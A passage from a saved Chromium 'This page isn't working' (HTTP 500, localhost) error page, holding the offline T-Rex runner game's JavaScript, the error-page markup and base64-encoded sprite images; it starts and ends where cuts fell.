Obstacle.types = Runner.spriteDefinitionByType.original.OBSTACLES;
this.addCloud();
// Multiple Horizon lines
for (let i = 0; i < Runner.spriteDefinition.LINES.length; i++) {
this.horizonLines.push(
new HorizonLine(this.canvas, Runner.spriteDefinition.LINES[i]));
}
this.nightMode = new NightMode(this.canvas, this.spritePos.MOON,
this.dimensions.WIDTH);
},
/**
* Update obstacle definitions based on the speed of the game.
*/
adjustObstacleSpeed: function() {
for (let i = 0; i < Obstacle.types.length; i++) {
if (Runner.slowDown) {
Obstacle.types[i].multipleSpeed = Obstacle.types[i].multipleSpeed / 2;
Obstacle.types[i].minGap *= 1.5;
Obstacle.types[i].minSpeed = Obstacle.types[i].minSpeed / 2;
// Convert variable y position obstacles to fixed.
if (typeof (Obstacle.types[i].yPos) == 'object') {
Obstacle.types[i].yPos = Obstacle.types[i].yPos[0];
Obstacle.types[i].yPosMobile = Obstacle.types[i].yPos[0];
}
}
}
},
/**
* Update sprites to correspond to change in sprite sheet.
* @param {number} spritePos
*/
enableAltGameMode: function(spritePos) {
// Clear existing horizon objects.
this.clouds = [];
this.backgroundEls = [];
this.altGameModeActive = true;
this.spritePos = spritePos;
Obstacle.types = Runner.spriteDefinition.OBSTACLES;
this.adjustObstacleSpeed();
Obstacle.MAX_GAP_COEFFICIENT = Runner.spriteDefinition.MAX_GAP_COEFFICIENT;
Obstacle.MAX_OBSTACLE_LENGTH = Runner.spriteDefinition.MAX_OBSTACLE_LENGTH;
BackgroundEl.config = Runner.spriteDefinition.BACKGROUND_EL_CONFIG;
this.horizonLines = [];
for (let i = 0; i < Runner.spriteDefinition.LINES.length; i++) {
this.horizonLines.push(
new HorizonLine(this.canvas, Runner.spriteDefinition.LINES[i]));
}
this.reset();
},
/**
* @param {number} deltaTime
* @param {number} currentSpeed
* @param {boolean} updateObstacles Used as an override to prevent
* the obstacles from being updated / added. This happens in the
* ease in section.
* @param {boolean} showNightMode Night mode activated.
*/
update(deltaTime, currentSpeed, updateObstacles, showNightMode) {
this.runningTime += deltaTime;
if (this.altGameModeActive) {
this.updateBackgroundEls(deltaTime, currentSpeed);
}
for (let i = 0; i < this.horizonLines.length; i++) {
this.horizonLines[i].update(deltaTime, currentSpeed);
}
if (!this.altGameModeActive || Runner.spriteDefinition.HAS_CLOUDS) {
this.nightMode.update(showNightMode);
this.updateClouds(deltaTime, currentSpeed);
}
if (updateObstacles) {
this.updateObstacles(deltaTime, currentSpeed);
}
},
/**
* Update background element positions. Also handles creating new elements.
* @param {number} elSpeed
* @param {Array<Object>} bgElArray
* @param {number} maxBgEl
* @param {Function} bgElAddFunction
* @param {number} frequency
*/
updateBackgroundEl(elSpeed, bgElArray, maxBgEl, bgElAddFunction, frequency) {
const numElements = bgElArray.length;
if (numElements) {
for (let i = numElements - 1; i >= 0; i--) {
bgElArray[i].update(elSpeed);
}
const lastEl = bgElArray[numElements - 1];
// Check for adding a new element.
if (numElements < maxBgEl &&
(this.dimensions.WIDTH - lastEl.xPos) > lastEl.gap &&
frequency > Math.random()) {
bgElAddFunction();
}
} else {
bgElAddFunction();
}
},
/**
* Update the cloud positions.
* @param {number} deltaTime
* @param {number} speed
*/
updateClouds(deltaTime, speed) {
const elSpeed = this.cloudSpeed / 1000 * deltaTime * speed;
this.updateBackgroundEl(
elSpeed, this.clouds, this.config.MAX_CLOUDS, this.addCloud.bind(this),
this.cloudFrequency);
// Remove expired elements.
this.clouds = this.clouds.filter((obj) => !obj.remove);
},
/**
* Update the background element positions.
* @param {number} deltaTime
* @param {number} speed
*/
updateBackgroundEls(deltaTime, speed) {
this.updateBackgroundEl(
deltaTime, this.backgroundEls, BackgroundEl.config.MAX_BG_ELS,
this.addBackgroundEl.bind(this), this.cloudFrequency);
// Remove expired elements.
this.backgroundEls = this.backgroundEls.filter((obj) => !obj.remove);
},
/**
* Update the obstacle positions.
* @param {number} deltaTime
* @param {number} currentSpeed
*/
updateObstacles(deltaTime, currentSpeed) {
const updatedObstacles = this.obstacles.slice(0);
for (let i = 0; i < this.obstacles.length; i++) {
const obstacle = this.obstacles[i];
obstacle.update(deltaTime, currentSpeed);
// Clean up existing obstacles.
if (obstacle.remove) {
updatedObstacles.shift();
}
}
this.obstacles = updatedObstacles;
if (this.obstacles.length > 0) {
const lastObstacle = this.obstacles[this.obstacles.length - 1];
if (lastObstacle && !lastObstacle.followingObstacleCreated &&
lastObstacle.isVisible() &&
(lastObstacle.xPos + lastObstacle.width + lastObstacle.gap) <
this.dimensions.WIDTH) {
this.addNewObstacle(currentSpeed);
lastObstacle.followingObstacleCreated = true;
}
} else {
// Create new obstacles.
this.addNewObstacle(currentSpeed);
}
},
removeFirstObstacle() {
this.obstacles.shift();
},
/**
* Add a new obstacle.
* @param {number} currentSpeed
*/
addNewObstacle(currentSpeed) {
const obstacleCount =
Obstacle.types[Obstacle.types.length - 1].type != 'COLLECTABLE' ||
(Runner.isAltGameModeEnabled() && !this.altGameModeActive ||
this.altGameModeActive) ?
Obstacle.types.length - 1 :
Obstacle.types.length - 2;
const obstacleTypeIndex =
obstacleCount > 0 ? getRandomNum(0, obstacleCount) : 0;
const obstacleType = Obstacle.types[obstacleTypeIndex];
// Check for multiples of the same type of obstacle.
// Also check obstacle is available at current speed.
if ((obstacleCount > 0 && this.duplicateObstacleCheck(obstacleType.type)) ||
currentSpeed < obstacleType.minSpeed) {
this.addNewObstacle(currentSpeed);
} else {
const obstacleSpritePos = this.spritePos[obstacleType.type];
this.obstacles.push(new Obstacle(
this.canvasCtx, obstacleType, obstacleSpritePos, this.dimensions,
this.gapCoefficient, currentSpeed, obstacleType.width,
this.altGameModeActive));
this.obstacleHistory.unshift(obstacleType.type);
if (this.obstacleHistory.length > 1) {
this.obstacleHistory.splice(Runner.config.MAX_OBSTACLE_DUPLICATION);
}
}
},
/**
* Returns whether the previous two obstacles are the same as the next one.
* Maximum duplication is set in config value MAX_OBSTACLE_DUPLICATION.
* @return {boolean}
*/
duplicateObstacleCheck(nextObstacleType) {
let duplicateCount = 0;
for (let i = 0; i < this.obstacleHistory.length; i++) {
duplicateCount =
this.obstacleHistory[i] === nextObstacleType ? duplicateCount + 1 : 0;
}
return duplicateCount >= Runner.config.MAX_OBSTACLE_DUPLICATION;
},
/**
* Reset the horizon layer.
* Remove existing obstacles and reposition the horizon line.
*/
reset() {
this.obstacles = [];
for (let l = 0; l < this.horizonLines.length; l++) {
this.horizonLines[l].reset();
}
this.nightMode.reset();
},
/**
* Update the canvas width and scaling.
* @param {number} width Canvas width.
* @param {number} height Canvas height.
*/
resize(width, height) {
this.canvas.width = width;
this.canvas.height = height;
},
/**
* Add a new cloud to the horizon.
*/
addCloud() {
this.clouds.push(new Cloud(this.canvas, this.spritePos.CLOUD,
this.dimensions.WIDTH));
},
/**
* Add a random background element to the horizon.
*/
addBackgroundEl() {
const backgroundElTypes =
Object.keys(Runner.spriteDefinition.BACKGROUND_EL);
if (backgroundElTypes.length > 0) {
let index = getRandomNum(0, backgroundElTypes.length - 1);
let type = backgroundElTypes[index];
// Add variation if available.
while (type == this.lastEl && backgroundElTypes.length > 1) {
index = getRandomNum(0, backgroundElTypes.length - 1);
type = backgroundElTypes[index];
}
this.lastEl = type;
this.backgroundEls.push(new BackgroundEl(
this.canvas, this.spritePos.BACKGROUND_EL, this.dimensions.WIDTH,
type));
}
},
};
</script>
<script>// Copyright 2021 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
/* @const
* Add matching sprite definition and config to Runner.spriteDefinitionByType.
*/
const GAME_TYPE = [];
/**
* Obstacle definitions.
* minGap: minimum pixel space between obstacles.
* multipleSpeed: Speed at which multiples are allowed.
* speedOffset: speed faster / slower than the horizon.
* minSpeed: Minimum speed which the obstacle can make an appearance.
*
* @typedef {{
* type: string,
* width: number,
* height: number,
* yPos: number,
* multipleSpeed: number,
* minGap: number,
* minSpeed: number,
* collisionBoxes: Array<CollisionBox>,
* }}
*/
let ObstacleType;
/**
* T-Rex runner sprite definitions.
*/
Runner.spriteDefinitionByType = {
original: {
LDPI: {
BACKGROUND_EL: {x: 86, y: 2},
CACTUS_LARGE: {x: 332, y: 2},
CACTUS_SMALL: {x: 228, y: 2},
OBSTACLE_2: {x: 332, y: 2},
OBSTACLE: {x: 228, y: 2},
CLOUD: {x: 86, y: 2},
HORIZON: {x: 2, y: 54},
MOON: {x: 484, y: 2},
PTERODACTYL: {x: 134, y: 2},
RESTART: {x: 2, y: 68},
TEXT_SPRITE: {x: 655, y: 2},
TREX: {x: 848, y: 2},
STAR: {x: 645, y: 2},
COLLECTABLE: {x: 2, y: 2},
ALT_GAME_END: {x: 121, y: 2},
},
HDPI: {
BACKGROUND_EL: {x: 166, y: 2},
CACTUS_LARGE: {x: 652, y: 2},
CACTUS_SMALL: {x: 446, y: 2},
OBSTACLE_2: {x: 652, y: 2},
OBSTACLE: {x: 446, y: 2},
CLOUD: {x: 166, y: 2},
HORIZON: {x: 2, y: 104},
MOON: {x: 954, y: 2},
PTERODACTYL: {x: 260, y: 2},
RESTART: {x: 2, y: 130},
TEXT_SPRITE: {x: 1294, y: 2},
TREX: {x: 1678, y: 2},
STAR: {x: 1276, y: 2},
COLLECTABLE: {x: 4, y: 4},
ALT_GAME_END: {x: 242, y: 4},
},
MAX_GAP_COEFFICIENT: 1.5,
MAX_OBSTACLE_LENGTH: 3,
HAS_CLOUDS: 1,
BOTTOM_PAD: 10,
TREX: {
WAITING_1: {x: 44, w: 44, h: 47, xOffset: 0},
WAITING_2: {x: 0, w: 44, h: 47, xOffset: 0},
RUNNING_1: {x: 88, w: 44, h: 47, xOffset: 0},
RUNNING_2: {x: 132, w: 44, h: 47, xOffset: 0},
JUMPING: {x: 0, w: 44, h: 47, xOffset: 0},
CRASHED: {x: 220, w: 44, h: 47, xOffset: 0},
COLLISION_BOXES: [
new CollisionBox(22, 0, 17, 16),
new CollisionBox(1, 18, 30, 9),
new CollisionBox(10, 35, 14, 8),
new CollisionBox(1, 24, 29, 5),
new CollisionBox(5, 30, 21, 4),
new CollisionBox(9, 34, 15, 4),
],
},
/** @type {Array<ObstacleType>} */
OBSTACLES: [
{
type: 'CACTUS_SMALL',
width: 17,
height: 35,
yPos: 105,
multipleSpeed: 4,
minGap: 120,
minSpeed: 0,
collisionBoxes: [
new CollisionBox(0, 7, 5, 27),
new CollisionBox(4, 0, 6, 34),
new CollisionBox(10, 4, 7, 14),
],
},
{
type: 'CACTUS_LARGE',
width: 25,
height: 50,
yPos: 90,
multipleSpeed: 7,
minGap: 120,
minSpeed: 0,
collisionBoxes: [
new CollisionBox(0, 12, 7, 38),
new CollisionBox(8, 0, 7, 49),
new CollisionBox(13, 10, 10, 38),
],
},
{
type: 'PTERODACTYL',
width: 46,
height: 40,
yPos: [100, 75, 50], // Variable height.
yPosMobile: [100, 50], // Variable height mobile.
multipleSpeed: 999,
minSpeed: 8.5,
minGap: 150,
collisionBoxes: [
new CollisionBox(15, 15, 16, 5),
new CollisionBox(18, 21, 24, 6),
new CollisionBox(2, 14, 4, 3),
new CollisionBox(6, 10, 4, 7),
new CollisionBox(10, 8, 6, 9),
],
numFrames: 2,
frameRate: 1000 / 6,
speedOffset: .8,
},
],
BACKGROUND_EL: {
'CLOUD': {
HEIGHT: 14,
MAX_CLOUD_GAP: 400,
MAX_SKY_LEVEL: 30,
MIN_CLOUD_GAP: 100,
MIN_SKY_LEVEL: 71,
OFFSET: 4,
WIDTH: 46,
X_POS: 1,
Y_POS: 120,
},
},
BACKGROUND_EL_CONFIG: {
MAX_BG_ELS: 1,
MAX_GAP: 400,
MIN_GAP: 100,
POS: 0,
SPEED: 0.5,
Y_POS: 125,
},
LINES: [
{SOURCE_X: 2, SOURCE_Y: 52, WIDTH: 600, HEIGHT: 12, YPOS: 127},
],
},
};
</script>
</head>
<body id="t" class="neterror" style="font-family: "sans", Arial, sans-serif; font-size: 75%" jstcache="0">
<div id="main-frame-error" class="interstitial-wrapper" jstcache="0">
<div id="main-content" jstcache="0">
<div class="icon icon-generic" jstcache="0"></div>
<div id="main-message" jstcache="0">
<h1 jstcache="0">
<span jsselect="heading" jsvalues=".innerHTML:msg" jstcache="9">This page isn’t working</span>
<a id="error-information-button" class="hidden" onclick="toggleErrorInformationPopup();" jstcache="0"></a>
</h1>
<p jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="hostName" jstcache="22">localhost</strong> is currently unable to handle this request.</p>
<!--The suggestion list and error code are normally presented inline,
in which case error-information-popup-* divs have no effect. When
error-information-popup-container has the use-popup-container class, this
information is provided in a popup instead.-->
<div id="error-information-popup-container" jstcache="0">
<div id="error-information-popup" jstcache="0">
<div id="error-information-popup-box" jstcache="0">
<div id="error-information-popup-content" jstcache="0">
<div id="suggestions-list" style="display:none" jsdisplay="(suggestionsSummaryList && suggestionsSummaryList.length)" jstcache="16">
<p jsvalues=".innerHTML:suggestionsSummaryListHeader" jstcache="18"></p>
<ul jsvalues=".className:suggestionsSummaryList.length == 1 ? 'single-suggestion' : ''" jstcache="19">
<li jsselect="suggestionsSummaryList" jsvalues=".innerHTML:summary" jstcache="21"></li>
</ul>
</div>
<div class="error-code" jscontent="errorCode" jstcache="17">HTTP ERROR 500</div>
<p id="error-information-popup-close" jstcache="0">
<a class="link-button" jscontent="closeDescriptionPopup" onclick="toggleErrorInformationPopup();" jstcache="20">null</a>
</p>
</div>
</div>
</div>
</div>
<div id="download-links-wrapper" class="hidden" jstcache="0">
<div id="download-link-wrapper" jstcache="0">
<a id="download-link" class="link-button" onclick="downloadButtonClick()" jsselect="downloadButton" jscontent="msg" jsvalues=".disabledText:disabledMsg" jstcache="6" style="display: none;">
</a>
</div>
<div id="download-link-clicked-wrapper" class="hidden" jstcache="0">
<div id="download-link-clicked" class="link-button" jsselect="downloadButton" jscontent="disabledMsg" jstcache="11" style="display: none;">
</div>
</div>
</div>
<div id="save-page-for-later-button" class="hidden" jstcache="0">
<a class="link-button" onclick="savePageLaterClick()" jsselect="savePageLater" jscontent="savePageMsg" jstcache="10" style="display: none;">
</a>
</div>
<div id="cancel-save-page-button" class="hidden" onclick="cancelSavePageClick()" jsselect="savePageLater" jsvalues=".innerHTML:cancelMsg" jstcache="4" style="display: none;">
</div>
<div id="offline-content-list" class="list-hidden" hidden="" jstcache="0">
<div id="offline-content-list-visibility-card" onclick="toggleOfflineContentListVisibility(true)" jstcache="0">
<div id="offline-content-list-title" jsselect="offlineContentList" jscontent="title" jstcache="12" style="display: none;">
</div>
<div jstcache="0">
<div id="offline-content-list-show-text" jsselect="offlineContentList" jscontent="showText" jstcache="14" style="display: none;">
</div>
<div id="offline-content-list-hide-text" jsselect="offlineContentList" jscontent="hideText" jstcache="15" style="display: none;">
</div>
</div>
</div>
<div id="offline-content-suggestions" jstcache="0"></div>
<div id="offline-content-list-action" jstcache="0">
<a class="link-button" onclick="launchDownloadsPage()" jsselect="offlineContentList" jscontent="actionText" jstcache="13" style="display: none;">
</a>
</div>
</div>
</div>
</div>
<div id="buttons" class="nav-wrapper suggested-right" jstcache="0">
<div id="control-buttons" jstcache="0">
<button id="reload-button" class="blue-button text-button" onclick="reloadButtonClick(this.url);" jsselect="reloadButton" jsvalues=".url:reloadUrl" jscontent="msg" jstcache="5">Reload</button>
<button id="download-button" class="blue-button text-button" onclick="downloadButtonClick()" jsselect="downloadButton" jscontent="msg" jsvalues=".disabledText:disabledMsg" jstcache="6" style="display: none;">
</button>
</div>
<button id="details-button" class="secondary-button text-button small-link" onclick="detailsButtonClick(); toggleHelpBox()" jscontent="details" jsdisplay="(suggestionsDetails && suggestionsDetails.length > 0) || diagnose" jsvalues=".detailsText:details; .hideDetailsText:hideDetails;" jstcache="2" style="display: none;"></button>
</div>
<div id="details" class="hidden" jstcache="0">
<div class="suggestions" jsselect="suggestionsDetails" jstcache="3" jsinstance="*0" style="display: none;">
<div class="suggestion-header" jsvalues=".innerHTML:header" jstcache="7"></div>
<div class="suggestion-body" jsvalues=".innerHTML:body" jstcache="8"></div>
</div>
</div>
</div>
<div id="sub-frame-error" jstcache="0">
<!-- Show details when hovering over the icon, in case the details are
hidden because they're too large. -->
<div class="icon" jstcache="0"></div>
<div id="sub-frame-error-details" jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="hostName" jstcache="22">localhost</strong> is currently unable to handle this request.</div>
</div>
<div id="offline-resources" jstcache="0">
<img id="offline-resources-1x" src="data:image/png;base64,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" jstcache="0">
<img id="offline-resources-2x" src="data:image/png;base64,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